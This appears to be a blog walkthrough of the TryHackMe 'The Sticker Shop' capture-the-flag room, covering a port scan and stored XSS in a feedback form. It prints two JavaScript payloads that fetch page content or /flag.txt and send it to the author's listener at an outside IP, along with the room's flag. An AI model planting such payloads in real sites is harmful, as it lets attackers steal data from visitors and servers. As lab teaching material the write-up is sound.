TRYHACKME - The Sticker Shop

Posted Dec 7, 2024 Updated Dec 7, 2024

By Zeroo

2 min read

Easy room created by toxicat0r. This rooms focus on the XSS vulnerabilitty. So if you guys want to try it, you can access the room here.

Scanning

Start your machine to obtain the Machine IP address and Fire up your Nmap tools like always. To scan for the open port and services of the IP Address. Using the command nmap -sC -sV [IP Address], and wait for a couple of minute until the scanning finish.

From our scanning result, Here we got 2 open port which is 22 for SSH services and 8080 for HTTP. So there is a website serives assigned to the IP Address. Let visit the site by using this url http://IP MACHINE:8080.

Attack & Get The Flag

There 2 pages in the website which is Home and Feeback. Nothing was intresting in the Home page. Let see the Feebackk page.

This is the juicy part. As we all know the Feedback and Comment pages are quite famous with XSS Vulnerability. So here let test if the XSS is reflected by the machine or not.

Setup And Payload.

To test if the machine reflected to our XSS or not. First, i setup local server using command Python -m http.server 80. So that when using the XSS, i will be able to see the response on our local server.

For the test payload (Shout out to CHATGPT for the assist). For test payload, i use GET method to fetch the source code for the Home page. Here is the payload :

<script>
  fetch('/')
    .then(response => response.text())
    .then(data => {
      const encoded = btoa(data); // Base64 encode the response text
      new Image().src = 'http://10.17.0.175/' + encoded;
    })
    .catch(err => console.error(err));
</script>

Basically the payload do is fetch('/'): Requests the source code of the current page (index page), btoa(data): Converts the page source to a Base64-encoded string . new Image().src: Sends the encoded source as a GET parameter (source) to your server

The machine respone was send to our local python server and we got endoded Base64 strings from the response which if we decode it, we obtained the source code of the index page, just like our payload should do. This remark that our payload is working and the machine is facing XSS vulnerability.

Get The Flag.

In the rooms description, author mentioned that the flag was located at /flag.txt. So using same method as our test payload, to reflect the responses from the machine to our local python server. but Since we know the location of the flag. We just need to do a little bit changes from our test payload and our new payload is ready to go. Here is the new payload :

<script>
  fetch('/flag.txt')
    .then(response => response.text())
    .then(data => {
      new Image().src = 'http://10.17.0.175/?flag=' + encodeURIComponent(data);
    });
</script>

Retrun back to our local python server, and as you can see. The machine reflected the text in the \flag.txt to our local server and we managed to get the flag.

Flag

THM{B83789a69074f636f64a38879cfcabe8b62305ee6}

TryHackMe

XSS THM

This post is licensed under CC BY 4.0 by the author.